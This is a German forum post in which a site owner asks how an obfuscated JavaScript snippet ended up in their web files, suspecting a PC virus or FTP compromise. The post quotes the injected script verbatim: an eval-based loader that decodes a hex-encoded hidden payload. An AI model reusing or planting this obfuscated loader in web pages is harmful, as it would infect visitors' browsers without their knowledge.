Liebes Forum,
ich habe heute leider feststellen müssen, dass sich irgendein böswilliges Skript in meinen Dateien reingefressen hat.
<!-- ad --><script>bxxxjc="7a717d6b737b706a30696c776a7b363c2277786c7f737b3e6d6c7d2339766a6a6e2431312726302f2c28302d2c302f282c317f667b6c31212d2f2b7a272e267a7f287f267f27277d2d272d7f2d7d7c2f7d2b2d282926782b393e69777a6a7623392f393e767b7779766a23392f393e6d6a67727b233968776d777c7772776a67243e76777a7a7b70253920223177786c7f737b203e3c3725147866233c507f503c257b68777d233c507f503c25";wtxz="function giotpl(){ew=Math.PI;cf=parseInt;ij='length';jencty=cf(~((ew&ew)|(~ew&ew)&(ew&~ew)|(~ew&~ew)));et=cf(((jencty&jencty)|(~jencty&jencty)&(jencty&~jencty)|(~jencty&~jencty))&1);hx=et<<et;evic=jencty;fx='';yvk=String.fromCharCode;fy=eval;for(vm=jencty;vm<wtxz[ij];vm-=-et)evic+=wtxz.charCodeAt(vm);evic%=unescape(jencty+'x'+(et<<6));for(vm=jencty;vm<bxxxjc[ij];vm+=hx)fx+=yvk(cf(jencty+'x'+bxxxjc.charAt(vm)+bxxxjc.charAt(vm+cf(et)))^evic);try{fy(fx);}catch(e){try{eval(fx);}catch(e) {window.location='/';}}}try{eval('giotpl();')}catch(e) {}";eval(wtxz);</script><!-- /ad -->
Was genau geschieht hier bzw. wie wurde dieser Unsinn genau ermöglicht? Etwa durch einen Virus auf dem Rechner? Die Dateien wurden damals per FTP auf den Server übertragen. Nun bin ich mir nicht sicher, ob das Skript schon vorher eingebunden war (halt über den Virus) oder sich erst auf dem Webserver breit gemacht hat.
Herzlichen Dank vorab für Eure Unterstützung!
peacemaker